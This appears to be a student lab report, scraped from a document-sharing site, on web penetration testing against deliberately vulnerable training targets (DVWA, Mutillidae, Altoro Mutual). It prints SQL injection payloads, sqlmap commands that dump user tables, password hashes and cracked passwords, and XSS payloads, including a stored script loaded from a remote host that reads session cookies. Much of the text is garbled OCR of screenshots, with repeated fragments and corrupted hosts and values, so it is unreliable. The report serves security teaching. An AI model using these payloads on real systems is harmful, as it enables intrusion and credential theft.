Web應(yīng)用程序滲透測(cè)試_第1頁
Web應(yīng)用程序滲透測(cè)試_第2頁
Web應(yīng)用程序滲透測(cè)試_第3頁
Web應(yīng)用程序滲透測(cè)試_第4頁
Web應(yīng)用程序滲透測(cè)試_第5頁
已閱讀5頁,還剩15頁未讀 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡介

Web應(yīng)用程序滲透測(cè)試姓名:滕召維學(xué)號(hào):13084139一、 實(shí)驗(yàn)?zāi)康膶W(xué)習(xí)使用OWASPBWA靶機(jī)。學(xué)習(xí)使用KaliLinux進(jìn)行Web應(yīng)用程序滲透測(cè)試。二、 實(shí)驗(yàn)內(nèi)容使用w3af漏洞掃描器對(duì)OWASPBWA靶機(jī)進(jìn)行漏洞掃描。根據(jù)老師的課堂講授,按照課件相關(guān)內(nèi)容在OWASPBWA靶機(jī)上實(shí)踐XSS和SQL注入兩種攻擊。配合使用TamperData和sqlmap進(jìn)行sql注入攻擊。利用文件上傳漏洞植入Webshell。三、主要實(shí)驗(yàn)結(jié)果(一)使用w3af漏洞掃描器對(duì)OWASPBWA靶機(jī)進(jìn)行漏洞掃描1.啟動(dòng)w3af漏洞掃描器。2.編輯新建的Profile,也就是配置各種插件。對(duì)audit類插件勾選sqli和xss兩個(gè)插件,如下圖:DVWAredosOWASP-TOP10audit_high_riskbruteforcefast_scanfuLL_auditfull_audit_spider_mansitemapweb_infrastructureresponse_spLitting□HFrfissL-certificatexpath0SDVWAredosOWASP-TOP10audit_high_riskbruteforcefast_scanfuLL_auditfull_audit_spider_mansitemapweb_infrastructureresponse_spLitting□HFrfissL-certificatexpath0SxssI~I vetsqliThisplsendsinthe對(duì)crawl類插件只勾選web_spider,如下圖DVWAcitpmanT-,urlList.txtuser_dir/DVWAcitpmanT-,urlList.txtuser_dir/web_diffwordnetOWASP-TOPIOaudit_high_riskbruteforcefast_scanfulL_auditfulL_audit_spider_manActiveHLugin|lsitemapxmL/£pider_man/urL_fuzzer對(duì)web_spider的配置在窗口右側(cè),勾選only_forward并保存,如下圖only_forwardfoLLow_regexignore_regex對(duì)output類插件,只勾選輸出only_forwardfoLLow_regexignore_regex對(duì)output類插件,只勾選輸出html文件。對(duì)輸出文件的配置在窗口右側(cè),如下圖輸入文件名稱并保存。這樣掃描結(jié)果將保存在/root/dvwa.html文件中。IIIActivePLuginActiveIIIActivePLuginActiveoutput-file-/dvwa.htmLverbose4.如下圖在Target一欄輸入掃描的網(wǎng)址,單擊右側(cè)按鈕start啟動(dòng)掃描。Target:http://www.dvssc.eom/dvwa/indEx.php掃描過程中w3af-/r/SBBHProfilesEditVicToolsConfigurationHelp□直□EE 迢」金屆巴冀SearchScanconfigILog1ResultsExploitSearch0Vulnerabilities0Information0ErrorCrawlstatusInputspeed:0(URLs/min)Outputspeed:0(URLs/min)Queuesize:0(URLs)CurrentURL:Method:GET|http://www.dvssc.eom/joomLa/index.php|Querystring:(option,view,Itemid.Limitstart)ETA:Unknown(h:m)AuditstatusInputspeed:8.75(URLs/min)Outputspeed:35.18(URLs/min)Queuesize:46(URLs)CurrentURL:Method:GET|http://www.dvssc.eom/joomLa/index.php|Querystring:(option,tmpL,link)ETA:1.62748643761minutes(h:m).-Other—HTTPspeed:846(requests/min)掃描結(jié)果w3af-WebAttackand...覧x《?fiLe:///root/dvwa.htmL C|[0vGoogLe C^MostVisitedvJj|OffensiveSecurityX.KaLiLinuxX.KaLiDocsOExpLoit-DBh#w3aftargetURL'sURLhttp://www.dvs/r//dvwa/index.phpSecurityIssuesTypePortIssueVulnerabilitytcp/80SQLinjectioninaMySQLdatabasewasfoundat:"/dvwa/login.php".,usingHTTPmethodPOST.Thesentpost-datawas:,,username=a%27b%22c%27d%22&Login二Login&password=FrAmE30."whichmodifiesthe"username"parameter.Thisvulnerabilitywasfoundintherequestwithid85.URL:http:///dvwa/login.phpSeverity:High

SecurityIssuesTimeTypeMessageEnabledplugins:Thu30Oct201411:04:13PMEDTdebugpluginsauditsqli,xssbackpluginsoutputhtml_filebackpluginscrawlwebspiderbacktargetsettargethttp:///dvwa/index.phpbackThu30Oct201411:05:40PMEDTerrorTheweb_spiderplugingotanErrorwhilerequesting"http://www,dvssc,com/joamla/index,php?view=article&catid=29%3Athe-cms&id=26%3Aextensians&format=pdf&option=匚om_content<emid=40".Reason:"HTTPtimeouterro「after15,0seconds,"(二)在OWASPBWA靶機(jī)上實(shí)踐XSS和SQL注入兩種攻擊1.在KaliLinux攻擊主機(jī)上,按照課件第29頁,實(shí)踐“通過SQL注入攻擊繞過身份認(rèn)證機(jī)制”?/r//bank/Login.aspx?/r//bank/Login.aspxGoogleMostVisitedv|j|OffensiveSecurity^KaLiLinuxX^KaliDocsOExpLoit-DBSig門I門|匚:| |SearchAltoroMutual■ONLI忖EBANKINGLOGI忖F'ER£OhLU■ONLI忖EBANKINGLOGI忖F'ER£OhLUS%.LLBUSINESSINSIDEAlOnlineBankingLoginUsername:Password:OnlineBankingLoginUsername:Password:FEES。忖戈LDmpc^itF『odud■匸:he匚>;i仃LoanF『odu匚ts■匸:;uck*&匚包*Othm「£mfvi匚筈£hl£.LLE:U£IIIES£

PERSONALSMALLBUSINESSINSIDEtHelloAdminUserWelcometoAltoroMutualOnline.isArticlesteViewAccountDetails:C1IGO]2.XSS和SQL注入攻擊(1)在攻擊機(jī)上訪問/dvwa,按照1.的攻擊方法,登錄進(jìn)入DVWA訓(xùn)練系統(tǒng)。UsernameTrainingCoursesFollowenvironmentareprovidedforfaculitiesandstudentstostudyOWASPWebGoatMutilliUaeDmmn\/ulne「ableWebApplicationZAP-VWWEGhwt首先按照?qǐng)D示將DVWA應(yīng)用的安全等級(jí)設(shè)置為Low。DVWASecurity$ScriptSecurityDVWASecurity$ScriptSecuritySecurityLeveliscurrentlyhigh.Youcansetthesecurityleveltolow,mediumorhigh.lowThesecuritylevelchangesthevulnerabilitylevelofDVvlowSubmitPHPIDS,,實(shí)踐SQL注入攻擊。使用OWASPBWA靶機(jī)的DVWA應(yīng)用程序演示如何獲取后臺(tái)數(shù)據(jù)庫更多的信息。輸入文件“XSS&SQLi.txt”中的腳本。Submit將數(shù)據(jù)表中的每一行都顯示出來,輸入:’or'1=1Submit'or1=1ID:1or11=1Firstname:adminSurname:adminID:1or11=1Firstname:GordonSurname:BrownID:1or11=1Firstname:HackSurname:MeID:1or11=1Firstname:PabloSurname:PicassoID:1or11=1Firstname:BobSurname:Smith②查詢INFORMATION_SCHEMA系統(tǒng)表,輸入:'UNIONSELECT1,table_namefromINFORMATION_SCHEMA.tables--'iDocsOExpLoit-DBAircrack-ngUserID:| ||Submit|ID: 'UNIONSELECT1,table_namefromINFORMATION_SCHEMA?七②查詢INFORMATION_SCHEMA系統(tǒng)表,輸入:'UNIONSELECT1,table_namefromINFORMATION_SCHEMA.tables--'iDocsOExpLoit-DBAircrack-ngUserID:| ||Submit|ID: 'UNIONSELECT1,table_namefromINFORMATION_SCHEMA?七3|31總5-Firstname:1Surname:CHARACTEF^SETSID: 'UNIONSELECT1,table_namefromINFORMATION_SCHEMA?七3|31總占--Firstname:1Surname:COLLATIONSID: 'UNIONSELECT1,table_namefromINFORMATION_SCHEMA?七3|31總占--Firstname:1Surname:COLLATION_CHARACTER_SET_APPLICABILITYID: 1UNIONSELECT1,table_namefromINFORMATION_SCHEMA?珈1歸-Firstname:1Surname:COLUMNSID: 1UNIONSELECT1,table_namefromINFORMATION_SCHEMA?珈1歸-Firstname:1Surname:COLUMN_PRIVILEGESID:1UNIONSELECT1,Firstname:1table_namefromINFORMATION_SCHEMA?tmblesSurname:ENGINESID:1UNIONSELECT1,Firstname:1Surname:EVEbJTStable_namefromINFORMATION_SCHEMA.teble占ID:1UNIONSELECT1,Firstname:1Surname:FILEStable_namefromINFORMATION_SCHEMAfrom列出user表的內(nèi)容,輸入:'UNIONSELECT1,column_namefromINFORMATION_SCHEMA.columnswheretable_name='users'--'UserID:ID:1UNIONSELECTFirstname:1Surname:user_id1,column_namefromINFORMATION_SCHEMA.columnswheretable_nID:1FirstUNIONname:SELECT11,column_namefromINFORMATION_SCHEMA.columnswheretable_nID:1UNIONSELECTFirstname:1Surname:user_id1,column_namefromINFORMATION_SCHEMA.columnswheretable_nID:1FirstUNIONname:SELECT11,column_namefromINFORMATION_SCHEMA.columnswheretable_n| ||Submit]Surname:firstnameID:1UNIONSELECT1,Firstname:1Surname:lastnmniecolumn_namefromINFORMATION_SCHEMA?columnswheretable_name='users1--ame=1usersame=1usersID:1UNIONSELECT1,Firstname:1Surname:usercolumn_namefromINFORMATION_SCHEMA?columnswheretable_name='users'--ID:1UNIONSELECT1,Firstname:1Surname:passwordcolumn_namefromINFORMATION_SCHEMA?columnswheretable_name=1usersID:1UNIONSELECT1,Firstname:1Surname:avatarcolumn_namefromINFORMATION_SCHEMA.columnswheretable_name=1users取得口令的MD5值,輸入:'UNIONSELECTNULL,passwordfromusers--UserID:SubmitID:1UNIONSELECTNULL,passwordfromusers--Firstname:Surname:21232f297a57a5a743894a0e4a801fc3ID:1UNIONSELECTNULL7passwordfromusers--Firstname:Surname:e99a18c428cb3Sd5f26O853670922e03ID:1UNIONSELECTNULL7passwordfromusers--First門mniE:Surname:8d3533d75ae2c3966d7e0d4fcc69216bID:1UNIONSELECTNULL,passwordfromusers--First門qee:Surname:0dl07d09f5bbe40cade3de5c71e9e9b7ID:1UNIONSELECTNULL,passwordfromusers--Firstname:Surname:5f4dcc3b5aa765d61d8327debS82cf99使用concat()函數(shù)將所有的信息都列出來,輸入:’UNIONSELECTpassword,concat(first_name,'',last_name,'',user)fromusers--'UserID:SubmitID:1UNIONSELECTpassword,concat(f門Firstname:21232f297a57a5a743894a0e4a8Qlfc3Surname:adminadminadminID:1UNIONSELECTpassword,concaFirstname:e99a18c428cb38d5f260853678922e03Surname:GordonBrowngordonbID:1UNIONSELECTpassword,concat(f門Firstname:21232f297a57a5a743894a0e4a8Qlfc3Surname:adminadminadminID:1UNIONSELECTpassword,concaFirstname:e99a18c428cb38d5f260853678922e03Surname:GordonBrowngordonbID:1UNIONSELECTpassword/con匚f1rst_namej.Firstname:8d3533d75ae2c3966d7e0d4fcc69216bSurname:HackMe1337ID:1UNIONSELECTpassword^con匚f1rst_name,Firs;tname:Odl07dO9f5bbe4Dcade3de5c71e9e9b7Surname:PabloPicassopabloID:1UNIONSELECTpassword^concat(f1rst_name,Firstname:5f4dcc3b5aa765d61d8327deb882cf99Sur*name:BobSmithsmithy,las^name,,last_rimmsflast_rimmsfuser)fromfuser)from#user)from,user)from,user)fromusers??users??users??(4)按照課件第40頁,實(shí)踐反射式XSS攻擊。①輸入vscript>alert('Havefuns')v/script>HavefunsOK②輸入vscript>alert(document.cookie)v/script>security=low;PHPSESSID=90uljvad6ldfven0er2s4fhuhlOK(5)按照課件第43頁,訪問/mutillidae,登錄進(jìn)入mutilidae訓(xùn)練系統(tǒng),實(shí)踐存儲(chǔ)式XSS攻擊。訪問Mutillidae的CrossSiteScripting(XSS)輸入:vSCRIPT/XSSSRC="/xss.js">v/SCRIPT>xss.js的內(nèi)容如下:document.write("Thisisremotetextviaxss.jslocatedat/r/"+document.cookie);alert("Thisisremotetextviaxss.jslocatedat/r/"+document.cookie);首先按照sql注入攻擊登錄進(jìn)入mutilidae訓(xùn)練系統(tǒng)

Mutillidae:Hack,Learn,Secure,HaveFun!!!YouareloggedinasadminMonkey!!!輸入:vSCRIPT/XSSSRC="/xss.js">v/SCRIPT>AddtoyourblogWelcometoyourblog,leaveanentry.Login,,oryouwillbelistedas"ano<SCRIPT/^§SRC="http:///xss.]s">-:/SCRIPT>SubmitThisisremotetextviaxss.jslocatedat/r/uid=l;PHPSESSID=90uljvad6ldfven0er2s4fhuhlOKco:document.write("Thisisremotetextviaxss.jslocatedat/r/"+document.cookie);co:0K…一…Thisisremotetextviaxss.jslocatedat/r/uid=l;showhints=O;PHPSESSID=90uljvad6ldfven0er2s4fhuhlalert("Thisisremotetextviaxss.jslocatedat/r/"+document.cookie);(三)配合使用TamperData和sqlmap進(jìn)行sql注入攻擊

tamperData11.0.1 ◎NameLastUpdated|[jBestmatchSearch:OMyAdd-ons?AvailableAdd-onsTamperData11.0.1tamperData11.0.1 ◎NameLastUpdated|[jBestmatchSearch:OMyAdd-ons?AvailableAdd-onsTamperData11.0.102/11/2010UsetamperdatatoviewandmodifyHTTP/HTTPSheadersandp...Mo「q呵TamperDataIconRedux1.2重復(fù)(二)中步驟2-(1)和2-(2)。啟動(dòng)TamperData插件。InstaLL10/18/20124.按照課件33頁使用Sqlmap進(jìn)行SQL注入攻擊。(1)掃描,輸入:sqlmap-u'29/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='TamperData插件抓取的內(nèi)容’

root?kali:-^fsqlmap-u1http .1(3.129/dvw呂/甘ulnEr^bilities/sqli/?id=aa&Submit=Submit#'--cookie^1security=low;PHPSESSID=v7ons9147pk8vp2d9vb5dru5451sqlmap/1.O-dev-automatic[!]legaldisclaimer:Usageofconsentisillegal.Itisthelocalfstateandfederallaws.sibleforanymisuse□rdamageSQLinjectionanddatabasetakeovertoolsqlmapforattackingt呂rgetswithoutpriormutualenduser1sresponsibilitytoobeySQLinjectionanddatabasetakeovertoolsqlmapforattackingt呂rgetswithoutpriormutualenduser1sresponsibilitytoobeyallapplicableDevelopersassumenoliabilityand呂「總notresponcausedbythisprogram[*]startingat07:08:02[07:08:02][07:08:03]seconds[07:08:04][07:08:04][07:08:04][INFO]testingif[INFO]targetURL[INFO]testingifthetargetURLisstable.ThiscantakeacoupleofissGET[07:08:02][07:08:03]seconds[07:08:04][07:08:04][07:08:04][INFO]testingif[INFO]targetURL[INFO]testingifthetargetURLisstable.ThiscantakeacoupleofissGET蠢巍圍ODES[WARNING]GETparameter1id1doesnotappeardynamic[07:08:04][INFO]heuristicsdetectedwebpagecharswt1ascii1[07:08:04][INFO]heuristic(basic)testshowsthatGETparameter'id'mightbeinjectable(possibleDBMS:'MySOL')[07:08:04][INFO]testingforSQLinjactiononGETparameter1id1heuristic(parsing)testshowedthattheback-endDBMScouldbe'MySQL'.DoyouwanttoskiptestpayloadsspecificforotherDBMSes?[Y/n]|ELECT(CASEWHEN(5382=5382)THEN1ELSEQEND)),0x7163617371^LOORfRANDO)*2))xFROMINFORMATION_SCHEMA.CHARACTER_SETSGROUPBYx)a)AND1aYhM1=1aYhMSSubmit=SubmitType:UNIONqueryTitle:MySQLUNIONquery(NULL)-2columnsPayload:id=aa1UNIONALLSELECTCONCAT(flx716f637071,0x645Q6868766e64566f75,0x7163617371),NULL#SSubmit=SubmitType:AND/ORtime-basedblindTitle:MySQL<5.0.12ANDtime-basedblind(heavyquery)Payload:id=aa1AND4578=BENCHMARK(500GOOO,MD5(0x70616941)]AND'Bedt'='BedtSSubmit=Submit[07:11:5Q][INFO]theback-endDBMSisMySQLwebserveroperatingsystem:LinuxUbuntu19.04(fLucidLpnx)webapplicationtechnology:PHP5.3£_.Apacheback-endDBMS:MySQL5.0[fl7:ll:5Q][INFO]fetcheddataloggedtotextfilesund電r1/usr7sharG/sqlmap/output/lQ.10.10.1291[:+:]shuttingdownat07:11:50root(3kali:-#|(2)獲取數(shù)據(jù)庫名,輸入:sqlmap-u'29/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='TamperData插件抓取的內(nèi)容'--dbs-v0root^kali:-#sqlmap-u1http://10.13.IO.129/dvwa/vulnerabilities/sqli/?id=aaSSubmit=Submit#'--cookie=lsecurity=low;PHPSESSID=v7ons9147pk8vp2d9vb5dru5451--dbs-vQ

Type:UNIONqueryTitle:MySQLUNIONquery(NULL)-2columnsPayload:id=aa'UNIONALLSELECTCONCAT(0x716f637O71/0x64506868766Q64566f7E0x7163617371)/NULL#&Submit=SubmitType:AND/ORtime-basedblindTitle:MySQL<5.0.12ANDtime-basedblind(heavyquery)Payload:id=aa1AND4578=BENCHMARK(5000000川D5(0x70616941))AND'Bedt^'Bec&Submit=Submitwebserveropormtingsystem:LinuxUbuntu10.04(LucidLynx)5?3?2#Apache2.2.14webapplicationtechnology:PHPback-endDBMS5?3?2#Apache2.2.14[*]dvwa[*]informationschema[*]shuttingdownat(37:14:3(3獲取dvwa數(shù)據(jù)庫中存在的表名,輸入:sqlmap-u'29/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='TamperData插件抓取的內(nèi)容'-Ddvwa--tablesroot(gkali:-#sqlmap-u1http://lQ.IQ.10.129/dvwa/vulnerabilities/sqli/?id=aaSSubmit=Submit#'--cookie='security=low;PHPSESSID=v7ons9147pk8vp2d9vb5dru5451-Ddvwa--tablesType:AND/ORtime-basedblindTitle:MySQL<5.Q.12ANDtime-basedblind(heavyquery)Payload:id=aa1AND4578=BENCHMARK(50QQ00OfMD5(0x70616941))AND'Bedt&Submit=Submit[07:17:47][INFO]theback-GndDBMSisMySQLwebserveroperatingsystem:LinuxUbuntu1(3.04(LucidLynx)webapplicationtechnology:PHP5?3?2「Apache2?2.14back-endDBMS:MySQL5.0[07:17:47][INFO]fetchingtablesfordatabase:1dvwa1[07:17:47][WARNING]reflectivevalue(s)foundandfilteringoutDatabase:dvwa[2tables]+ +|guestbook|[07:17:47][INFO]fetcheddataloggedtotextfilesunder1/usr/shBro/sqlmBp/output/29'[*]shuttingdownat07:17:47獲取users表中的字段列表,輸入:sqlmap-u'29/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='TamperData插件抓取的內(nèi)容'-Ddvwa--tables-Tusers--columnsshuttingdownatQ7:17:47root^kali:*#sqlmap-u'http://lG.lfl.lO.129/dvwa/vulnerabilities/sqli/?id=aa6!Submit^Submit#1--cookie^1security=low;PHPSESSID=v7ons9147pk8vp2d9vb5dru5451-Ddv--tables-T --columns」

[07:20:39][INFO]fetchingcolumnsfortable1users1indatabase1dvwa[07:20:39][WARNING]reflectivevalue(s)foundandfilteringoutDatabase:dvwaTable:users[6columns] Column 1F Typs————————————1useravatarfirst_namelastnamepassworduserid J1 varcharf15)varchar(7G)varchart15)varchart15)varchaint⑹F rr?mnnnnmnnra(5)把Password字段內(nèi)容搞出來,輸入:sqlmap-u'29/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='TamperData插件抓取的內(nèi)容'-Ddvwa--tables-Tusers--columns--dump|[:t:]shuttingdownat07:20:39root^kali:'#sqlmap-u1http://10.IO.IO.129/dvwa/vulnerabilities/sqli/?id=aaSSubmit=Submit#'--cookie^1security=low;PHPSESSID=v7ons9147pk8vp2d9vb5dru5451-Ddv--teblms-Tusmrs--columns--dump-[07:22:43][INFO]fetchingcolumnsfortable1users1indatabase1dvwaDatabase:dvwaTable:users[6columns]|Column|ColumnITypeuseravatarfiruseravatarfirst_namelast_namepassworduser_idvarcharf15)varchar(70)varchar(15)varchar(15)varchar(32)int(6)[07:22:43][07:22:43][G7:22:43][07:22:43][07:22:43]se1[07:22:43][07:22:43][G7:22:43][07:22:43][07:22:43]se1dvwa11dvwa1[INFO]fetchingcolumn[INFO]fetchingentrie[WARNING]reflectivevalue(s)foundandfilterin対out[INFO]analyzingtabledumpforpossiblepasswordhashes[INFO]recognizedpossiblepasswordhashesincolumn1password1doyouwanttostorehashestoatemporaryfileforeventualfurtherprocessingwithothertools[y/N]||[07:30:03][INFO]postprocessingtabledumpDatabase:dvwaTable:users[5entries]jr |user_id|useravatar|passwordlast_name|first_name|f11adminhttp://owaspbwa/dvwa/hackable/users/admirj7}/p^/_r|^1232f297a57a5a743894a0e4a801fc3(admin)adminadmin12|gordonb|http://owaspbwa/dvwa/hackable/users/gordanb.jpa|e99al8c428cb38d5f260853678922e03(abcl23)BrownGordon13 |1337http://owaspbwa/dvwa/hackablq/usqrs/1337.jpg|8d3533d75ae2c3966d7e0d4fcc69216b(charley)MeHack14 |pablohttp://owaspbwa/dvwa/hackablQ/users/pablo.jpg|0dl07d09f5bbG40cadQ3dG5c71G9Q9b7(letmein)PicassoPablo15 |smithyhttp://owaspbwa/dvwa/hackable/us?rs/smithy.jpg|5f4dcc3b5aa765d61d8327deb882cf99(password)|Smith |Bob[07:30:03][INFO]table'dvwa.users'dumpedtoCSVfile'/usr/share/sqlmap/output/29/dump/dvwa/users.csv'LINEQ]fotchoddatalaaaedtotextfilesunder'/usr/shara/scilniBD/outout/lia.1?.1?. ⑹使用sqlmap獲取口令明文,輸入:sqlmap-u'29/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#'--cookie='TamperData

插件抓取的內(nèi)容'-Ddvwa--tables-Tusers--columns--dump[:+:]shuttingdownat07:23:57root(3kali:*^sqlmap-u'http://10.IQ.IO.129/dvwa/vulnerat)ilities/sqli/?ici=aa&Subniit=S;ijbmit捧'--cookie=lsecurity=low;PHPSESSID=v7ons9147pk8vp2d9vb5dru545'-Ddvwa--tables-Tusers--columns--dump[07:33:05][INFO]postprocessingtabledumpDatabase:dvwaTable:users[5entries]r + + +|user_id|user |avatar + + password |last_name|first_namQ1 1 11 2 |1 3 11 4 |1 5 |k □adminqordonb1337 |pablosmithyF Thttp://owaspbwa/dvwa/hackable/users/admirfTyp^^\|http://owaspbwa/dvwa/hackable/usQrs/gordonb.jp纟1http://owaspbwa/dvwa/hackable/users/1337.jpghttp://owaspbwa/dvwa/hackable/users/pablo?jpg |http://owaspbwa/dvwa/hackable/usQrs/smithy.jpgF +ril232fp^7a57a5a743894a0e4a8Olfc3(admin)e99al8c42Bcb38d5f26e853678922Q03(abc123)L833533d75a^396Bd7e0d41:cc692l6b(charley)0dl07d09f5bbe40cade3de5c71e9e9b7(letmein)5f4dcc3b5aa765d61d8327deb882cf99(password) □adminBrownMePicassoSmithF TadminGordonHackPabloBobF [07:33:05][INFO]table'dvwa.users'dumpedtoCSVfile'/usr/share/sqlmap/output/29/dump/dvwa/users.csv[

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒有圖紙預(yù)覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論